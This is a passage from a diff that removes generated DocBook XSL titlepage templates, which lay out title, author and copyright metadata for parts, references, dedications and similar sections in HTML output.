-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.recto">
- <xsl:choose>
- <xsl:when test="partintroinfo/title">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="partintroinfo/subtitle">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/corpauthor"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/authorgroup"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/author"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/othercredit"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/releaseinfo"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/copyright"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/legalnotice"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/pubdate"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revision"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/revhistory"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="partintroinfo/abstract"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="partintro.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="partintro.titlepage">
- <div>
- <xsl:variable name="recto.content">
- <xsl:call-template name="partintro.titlepage.before.recto"/>
- <xsl:call-template name="partintro.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="partintro.titlepage.before.verso"/>
- <xsl:call-template name="partintro.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="partintro.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="partintro.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="partintro.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="partintro.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="partintro.titlepage.recto.style">
-<xsl:apply-templates select="." mode="partintro.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.recto">
- <xsl:choose>
- <xsl:when test="referenceinfo/title">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="referenceinfo/subtitle">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/corpauthor"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/authorgroup"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/author"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/othercredit"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/releaseinfo"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/copyright"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/legalnotice"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/pubdate"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revision"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/revhistory"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="referenceinfo/abstract"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="reference.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="reference.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="reference.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="reference.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="reference.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="reference.titlepage.before.recto"/>
- <xsl:call-template name="reference.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="reference.titlepage.before.verso"/>
- <xsl:call-template name="reference.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="reference.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="reference.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="reference.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="reference.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="reference.titlepage.recto.style">
-<xsl:apply-templates select="." mode="reference.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.recto">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="refentry.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="refentry.titlepage.before.recto"/>
- <xsl:call-template name="refentry.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="refentry.titlepage.before.verso"/>
- <xsl:call-template name="refentry.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="refentry.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="refentry.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="refentry.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.recto">
- <div xsl:use-attribute-sets="dedication.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::dedication[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="dedicationinfo/subtitle">
- <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="dedicationinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="dedication.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="dedication.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="dedication.titlepage.before.recto"/>
- <xsl:call-template name="dedication.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="dedication.titlepage.before.verso"/>
- <xsl:call-template name="dedication.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="dedication.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="dedication.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="dedication.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="dedication.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="dedication.titlepage.recto.style">
-<xsl:apply-templates select="." mode="dedication.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.recto">
- <div xsl:use-attribute-sets="acknowledgements.titlepage.recto.style">
-<xsl:call-template name="component.title">
-<xsl:with-param name="node" select="ancestor-or-self::acknowledgements[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="acknowledgementsinfo/subtitle">
- <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="acknowledgementsinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="acknowledgements.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="acknowledgements.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="acknowledgements.titlepage.before.recto"/>
- <xsl:call-template name="acknowledgements.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="acknowledgements.titlepage.before.verso"/>
- <xsl:call-template name="acknowledgements.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="acknowledgements.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="acknowledgements.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="acknowledgements.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="acknowledgements.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="acknowledgements.titlepage.recto.style">
-<xsl:apply-templates select="." mode="acknowledgements.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="preface.titlepage.recto">
- <xsl:choose>
- <xsl:when test="prefaceinfo/title">
- <xsl:apply-templates mode="preface.titlepage.recto.auto.mode" select="prefaceinfo/title"/>
- </xsl:when>
- <xsl:when test="docinfo/title">
